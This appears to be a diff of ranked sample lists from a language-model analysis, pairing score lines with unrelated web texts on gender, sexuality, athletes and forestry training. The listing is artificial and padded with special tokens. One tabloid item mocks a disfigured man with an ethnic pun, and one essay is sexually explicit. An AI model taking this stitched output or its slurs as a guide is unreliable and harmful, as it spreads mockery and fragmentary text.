allowed myself to see lots of things in it that I don’t know if Lorde actually intended. These are some things I see when I look at these words. + +Lorde has described wanting the best qualities of her mother and father and wanting to be both hard and soft during sex. When I read this I thought about how people are expected to limit their self-expression and interests to what society believes is appropriate for their sex, and Lorde is refusing to limit herself that way. She wants the full human experience, not just a half of it. Gender roles and ================================================================================ -Rank = 2; Score = 503808.0 +Rank = 3; Score = 246784.0 <|begin_of_text|>WOMEN and men face double-standards. That this should show up in the language is no surprise. Men who put themselves forward at work are “assertive”, women who do the same are more often “pushy” or “bossy”; men are “persistent” whereas women are “nagging”; men are “frustrated”, women “upset”. A man has a lot to say; a woman is “chatty”. A man discusses the doings of his colleagues and rivals; a woman “gossips”. Readers tempted to doubt can check for themselves. For an impressionistic survey, type “gossip” into Google, click on “images” and see who appears to be doing it; then try the same with “nagging” and “bossy”. For hard data, try Google’s “Ngram” viewer, which shows the frequency of words and phrases among the hundreds of billions of words in the books scanned by Google, spanning centuries. One of the most common words following “gossiping” is “old”. And the most common words to follow “gossiping old” are, in this order: “women”, “woman”, “men”, “lady” and “ladies”. @@ -38,71 +53,73 @@ Some words are trickier than mere double-standards: those using them may think t “Nonsense”, some will reply. The Economist has used “feisty” recently to refer to Greece’s leftist government, a South African tabloid, a (male) Argentinian presidential candidate and Singaporean opposition bloggers. But it is also used fairly frequently with female figures. The common thread seems to be a sense of smallness or underdog status: nobody calls a jowly dictator or heavyweight boxer “feisty”. Google’s book data say much the same. “Little” is one of the most common words to follow “feisty”, and the most common words to follow “feisty little” are “girl”, “man”, “thing”, “guy”, “woman” and “lady”. Rounding out the top ten words following “feisty little”, intriguingly, are “Irishman” and “bastard ================================================================================ -Rank = 3; Score = 456704.0 -<|begin_of_text|>Utah’s Wasatch GOP has two chairmen. One of them is named James C. Green. Mr. Green has some big ideas and he decided to share one of those big ideas with the public. - -Here’s Mr. Green’s caveman missive: +Rank = 4; Score = 238592.0 +<|begin_of_text|>Most Democrats want stricter gun laws, and most Republicans oppose them. So you might expect the election of Donald Trump and a Republican-controlled Congress to be great news for the nation’s gunmakers. But surprisingly, the opposite turned out to be the case. -Equal Pay For Women Has Consequences +Two of the nation’s biggest gun manufacturers, Smith & Wesson and Sturm Ruger, saw their stock prices fall by double digits this morning in the wake of Trump’s election victory. -Editor: Here's the problem with the Equal Pay bill being considered by the Utah Legislature... Traditionally men have earned more than women in the workplace because they are considered the primary breadwinners for families. They need to make enough to support their families and allow the Mother to remain in the home to raise and nurture the children. +Here’s one theory for what’s going on: In recent years, gun sales have been driven by fears of gun confiscations. Gun sales soared after Obama’s election in 2008 and again when he was reelected in 2012, as people worried that the president would begin to confiscate the nation’s firearms. -If businesses are forced to pay women the same as male earnings, that means they will have to reduce the pay for the men they employ... simple economics. If that happens, then men will have an even more difficult time earning enough to support their families, which will mean more Mothers will be forced to leave the home (where they may prefer to be) to join the workforce to make up the difference. +In contrast, gun owners have little to fear from a Trump presidency or a Republican Congress. So gunmakers are likely to make fewer sales over the next four years.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 5; Score = 231424.0 +<|begin_of_text|>The forestry industry is largely inaccessible to women for many reasons; however, Forestry Training for Women will remedy that. Personal Protective Equipment [PPE] is not made in small enough sizes, both foot-wear and clothes to fit many women. Training for using forestry kit, in particular chainsaws, is taught in such a way as to emphasize physical strength when in fact using the “right” technique can get over most issues. If funded, this course will provide an environment to practice these techniques in private with other female participants. Students would learn to service and sharpen saws and hand tools together with all aspects of woodland and forestry skills and work. This would empower students to compete on equal terms in the job market with their male counterparts. Students will also be taught about tree identification, the various uses they serve in the landscape and small sawmill operation. -And as even more women thus enter the workforce that creates more competition for jobs (even men's jobs) and puts further downward pressure on the pay for all jobs... meaning more and more Mothers will be forced into the workforce. And that is bad for families and thus for all of society. +The photograph above shows the various tools used in forestry and the difference between men and womens sized boots. -It's a vicious cycle that only gets worse the more equality of pay is forced upon us. It's a situation of well-meaning intentions, but negative unintended consequences. +Digger driving is another aspect of forestry that is seen as a male dominated job. Lighter women sometimes cannot use digger cabs, levers and pedals effectively. A second component of this course would address the use of a Digger and provide women with the training needed to operate one comfortably. This course will teach women to service and care for their machine, how to operate it and provide a few simple adaptations to overcome the male oriented aspects of the machine. The course will cover and practice the most common requirements such as trench digging and ditching along with a range of different scenarios that might be encountered on a daily level. -We should encourage our Legislators to drop the whole notion. Let the marketplace determine what free-market forces should prevail. It is not the role of government to dictate to businesses what they should pay anyway... either as a Minimum Wage or Equal Pay for men and women. +There are few opportunities for women to compete and train on an equal level to men. We aim to address this by offering training and real life practice in a safe and all encompassing environment where women would feel comfortable to learn. The funding would allow us to purchase a second hand digger for training purposes, saws and PPE for participants. -James C. Green +It is important to note that instructors will be male and while this course is aimed at women students, male participants are encouraged to join if interested. -Wasatch Co. GOP Vice-Chair<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +A forestry winch attached to a tractor. This allows for safer removal of large trees and debris, lowering the risk of injury.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 4; Score = 444416.0 -<|begin_of_text|>Gay, bi or straight, people are having same-sex experience in their lifetime. +Rank = 6; Score = 226304.0 +<|begin_of_text|>Doctors in India have saved the life of a young boy who had two extra arms and two extra legs growing out of his stomach. -More American men and women are identifying as bisexual, reports a recent publication by the Centers for Disease Control and Prevention. +Related news Chang Du from Henan Man has huge growth on his face, & he's CHINese! Chang Du has a huge growth on his face – and he's CHINese! But the disfigured 47-year-old man from Henan province can't afford medical care. -The study, which utilised the data collected from the 2011-2013 National Survey of Family Growth (NSFG), aims to provide ‘national estimates of sexual behaviours, sexual attraction, and sexual orientation among women and men aged 18–44 in the United States.’ +Zhang Ruifang, China Old woman (101) grows devil-like horns! Old woman Zhang Ruifang (101), a mother-of-seven from China, has brown devil-like horns growing out of her forehead - one is already six cm long! -Over 9,000 adults’ interview results were used to churn out the end statistics. +Some people had venerated Deepak Kumar (8) from Bangalore as a god, while others saw him as a demonic monster. -The outcome reports that 5.5% of women and 2.0% of men said they are bisexual in the 2011–2013 NSFG, as compared to the previous 2006–2010 NSFG study which found that only 3.9% of women and 1.2% of men identified as bisexual. +But doctors, on the other hand, saw the boy with the eight limbs as parasitic twins – a form of twin similar to conjoined siblings, but where the development process has gone even more wrong. -And among those who reported themselves as ‘heterosexual or straight,’ 12.6% of women and 2.8% of men said that they had had same-sex sexual contact. +Deepak’s father Viresh Paswan, a construction worker in his 30s, would not give up the dream that his son could lead a normal wife, launching a public appeal in March. -The study also provides other interesting insights about what different couples do in bed: +And now it’s finally over. -Women who reported to be ‘homosexual or bisexual’ were more likely to have had anal sex with an opposite-sex partner (44.2%) compared with 35.4% of heterosexual women. +Deepak’s extra limbs were surgically removed in a hospital. -More women in the ‘homosexual or bisexual’ group had ever had opposite-sex sexual contact (89.7%), as compared to men (67.9%). +“He is 100 per cent fit,” chief surgeon Ramcharan Thiagrajan said following the operation. He added: “Due to all the mockery and stigma he has faced he is very restless and nervous. But now after this successful operation and counselling he will lead a normal life.” -And surprisingly, or not, 16.4% of women and 11.4% of men who had identified as ‘homosexual or bisexual’ had never had same-sex sexual contact.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +In turn, Deepak’s father was overjoyed: “My dream has come true, now we will celebrate it after returning to my village.” + +Related news + +Chang Du has a huge growth on his face – and he's CHINese! But the disfigured 47-year-old man from Henan province can't afford medical care.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 5; Score = 436224.0 -<|begin_of_text|>What’s happening to female characters in video games? They’ve been around forever and they’ve seen the changes of growing technology and differing trends, but it never felt like they ever truly lost anything. They simply grew with the stories and games, maybe became a little more numerous as games started including more characters and options. Recently though, they have changed. Not due to the natural evolution of the medium, but seemingly due to this idea rooted in the stereotype that only dudes game, and because only dudes game, the only way we can view female characters is through the eyes of guys. And thus while male characters are perfectly allowed to remain muscle-bound, stoic, and badass, women must be “realistic” because otherwise guys might get the wrong idea. +Rank = 7; Score = 206848.0 +<|begin_of_text|>Female American athletes get less coverage in the media due to gender bias and instead what attention they get focuses more on attire, or how attractive, sexy or ladylike they are, write Emily Kaskan and Ivy Ho of the University of Massachusetts Lowell in Sex Roles, an interdisciplinary behavioral science journal offering a feminist perspective. -Now, aside from the fact that this is pretty insulting to the intelligence and motivations of men, it’s a little bizarre for the same people who want more women in the industry and enjoying video games to perpetually only address things from a strictly male perspective. A purely negative perspective at that, assuming only the very worst outlook from male gamers. Never have I seen from the arguments saying female characters need to change any reference to what women want in female characters. Which is a shame, because if we did, those characters wouldn’t change much. Because, objectively, there is enough diversity in how female characters present themselves that I believe most of the women who play are happy with it. +Kaskan and Ho looked at how pervasive small subtle biases and stereotyping of American female athletes are and what types of "microaggression" exist, examining how they put pressure on athletes and other women, as well. They reviewed popular Internet articles and research from the Psychinfo database, using keywords such as'sexism,''sports media,' 'Serena Williams' and 'Olympic coverage.' -The argument has already been made that men tend to be just as sexy and unrealistic as women when it comes to video games. And the usual rebuttal is “That’s just a male power fantasy.” Consider, maybe, that the sexy but deadly female heroine might be just as much a female power fantasy. Or the not-so-sexy but kind and passionate young girl who always strives to improve the lives of others. Or the badass female space marine fighting for her home. Has it occurred to no one making the argument against sexy characters that women have just as much of a need to fantasize—to become someone who is so unlike them, and yet, seems to hold the same values? Or even to become someone completely different from them just to unwind and forget life for a few hours? +They conclude that media often portray female athletes as inferior to their male counterparts and are dismissive of their true abilities. The little coverage received often sexually objectifies female athletes by putting the spotlight on their looks and strength. On the other hand, the media is quick to recoil at women who do not fit into the traditional feminine mold. -Speaking as a woman, I don’t play games for their realism. I don’t mind if a game embraces a little realism, as long as they’re still clearly rooted in fiction. I am especially partial to fantasy, and whether it’s a character I have made completely from scratch for a pen and paper roleplay, or a character -================================================================================ -Rank = 6; Score = 434176.0 -<|begin_of_text|>The forestry industry is largely inaccessible to women for many reasons; however, Forestry Training for Women will remedy that. Personal Protective Equipment [PPE] is not made in small enough sizes, both foot-wear and clothes to fit many women. Training for using forestry kit, in particular chainsaws, is taught in such a way as to emphasize physical strength when in fact using the “right” technique can get over most issues. If funded, this course will provide an environment to practice these techniques in private with other female participants. Students would learn to service and sharpen saws and hand tools together with all aspects of woodland and forestry skills and work. This would empower students to compete on equal terms in the job market with their male counterparts. Students will also be taught about tree identification, the various uses they serve in the landscape and small sawmill operation. +Anna Kournikova. EPA/Gerry Penny -The photograph above shows the various tools used in forestry and the difference between men and womens sized boots. +Is that an accurate characterization? Russian tennis star Anna Kournikova certainly got far more attention than her athletic prowess deserved, but so has Michael Sam. He is somehow among GQ's 2014 “Men of the Year” despite the fact that he was barely drafted by an NFL team, and the only is because hs is gay. A journal devoted to promoting the perspectives of heterosexual men could argue that the media was giving him special attention due to that. -Digger driving is another aspect of forestry that is seen as a male dominated job. Lighter women sometimes cannot use digger cabs, levers and pedals effectively. A second component of this course would address the use of a Digger and provide women with the training needed to operate one comfortably. This course will teach women to service and care for their machine, how to operate it and provide a few simple adaptations to overcome the male oriented aspects of the machine. The course will cover and practice the most common requirements such as trench digging and ditching along with a range of different scenarios that might be encountered on a daily level. +Outside culture studies and sociology, there is no credible acceptance of gender-based microaggressions so the authors invoke racial discrimination. Kaskan and Ho argue that subtle biases that place cumulative stress on female athletes influence how they think about themselves and their abilities. -There are few opportunities for women to compete and train on an equal level to men. We aim to address this by offering training and real life practice in a safe and all encompassing environment where women would feel comfortable to learn. The funding would allow us to purchase a second hand digger for training purposes, saws and PPE for participants. +Yes, Ronda Rousey must not know she can obliterate 99.9% of men just by glaring at them due to subtle microaggression on ESPN. In real life, she absolutely does know that, and she is arguably the most famous name in mixed martial arts - the most male of male sports - yet she knows she can look like this any time she wants too: -It is important to note that instructors will be male and while this course is aimed at women students, male participants are encouraged to join if interested. +That's not a problem for athletic women, it's a gigantic victory. -A forestry winch attached to a tractor. This allows for safer removal of large trees and debris, lowering the risk of injury.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Regardless, the authors believe that prolonged psychological stress can even trigger changes in their hormonal, immune and cardiovascular systems, and make athletes vulnerable to, among others, heart disease and hypertension. This, in turn, can influence a professional athlete's livelihood when she loses her place in ================================================================================ -Rank = 7; Score = 432128.0 +Rank = 8; Score = 202752.0 <|begin_of_text|>Prostitutes are penis experts. There is no other group of professionals – not scientists, not academic researchers, not journalists – that have more experience viewing and handling a large number and wide variety of penises. Additionally, prostitutes are probably the only professional group qualified to comment on how penises of differing sizes and shapes feel when they are inside a woman. It seems like every month another article about the latest penis size study is published. It’s a popular media topic because men are becoming increasingly obsessed with the size of their genitals, thanks in part to the wide availability of online porn showing women writhing in pleasure as they receive a plunging from one large penis after another. @@ -115,48 +132,58 @@ I’ve seen a lot of cocks. They come in all shapes, lengths, widths, and colors There are so many ways that one healthy penis can differ from the next, that it’s pointless to try to figure out what’s “normal” or “ideal.” Sure, you can go on Wikipedia, read that the average penis length is 5.17 inches, get an idea as to how you measure up against this average, and feel better (or worse) about yourself. But comparing yourself to a statistical average or striving for an ideal will not only give you a false perception of the wonderful diversity of healthy penises, but also impair your ability to see yourself as a valuable individual who uses your unique body to be the best ================================================================================ -Rank = 8; Score = 425984.0 -<|begin_of_text|>The issue is particularly nettlesome with individuals who have transitioned from male to female because of the belief that they might still have a physical advantage until their hormone therapy — which not every transgender person chooses to have — is complete. +Rank = 9; Score = 198656.0 +<|begin_of_text|>Gay, bi or straight, people are having same-sex experience in their lifetime. -“When you start talking about transgender athletes, a male-to-female individual, we want to ensure that that is truly a decision that is permanent,” said Bobby Cox, the commissioner of the Indiana High School Athletic Association. “It is not a decision that, ‘I just decided today that I am going to be a girl and I am going to go play on a girls’ team’ and perhaps, disadvantage those kids that are on the team and imbalance the competition. +More American men and women are identifying as bisexual, reports a recent publication by the Centers for Disease Control and Prevention. -“And as we progress down this path,’’ he added, “and as we spend more time and energy with advocacy groups and medical professionals in this area, I think that there will be additional amendments to our policies.” +The study, which utilised the data collected from the 2011-2013 National Survey of Family Growth (NSFG), aims to provide ‘national estimates of sexual behaviours, sexual attraction, and sexual orientation among women and men aged 18–44 in the United States.’ -There is no reliable data on the number of transgender high school athletes. Only about 0.6 percent of the adult population identifies as transgender, according to federal data from 2016. Researchers from the Williams Institute, who conducted the study, reported that 0.56 percent of adults in Indiana reported identifying as transgender. +Over 9,000 adults’ interview results were used to churn out the end statistics. -In Texas, 0.66 percent of adults said they identify as transgender, the fifth-highest percentage in the country (behind Hawaii, California, New Mexico and Georgia). Still, transgender children are considered an at-risk minority outside of sports. According to The New England Journal of Medicine, the rate of suicide attempts among transgender people is 40 percent, compared to 4.6 percent among those who are not transgender. +The outcome reports that 5.5% of women and 2.0% of men said they are bisexual in the 2011–2013 NSFG, as compared to the previous 2006–2010 NSFG study which found that only 3.9% of women and 1.2% of men identified as bisexual. -Relatively new policies are already being massaged and amended. In July, the Indiana state association voted unanimously to adjust its surgery requirement. It now no longer requires transgender students who are transitioning from female to male to have sex reassignment surgery in order to compete in the gender with which they identify. But that stipulation is still in place for someone transitioning from male to female. +And among those who reported themselves as ‘heterosexual or straight,’ 12.6% of women and 2.8% of men said that they had had same-sex sexual contact. -The group asserts it is acting in the name of fairness, but transgender rights activists accuse members of simply not wanting transgender people to participate, out of fear that those athletes will have an unfair 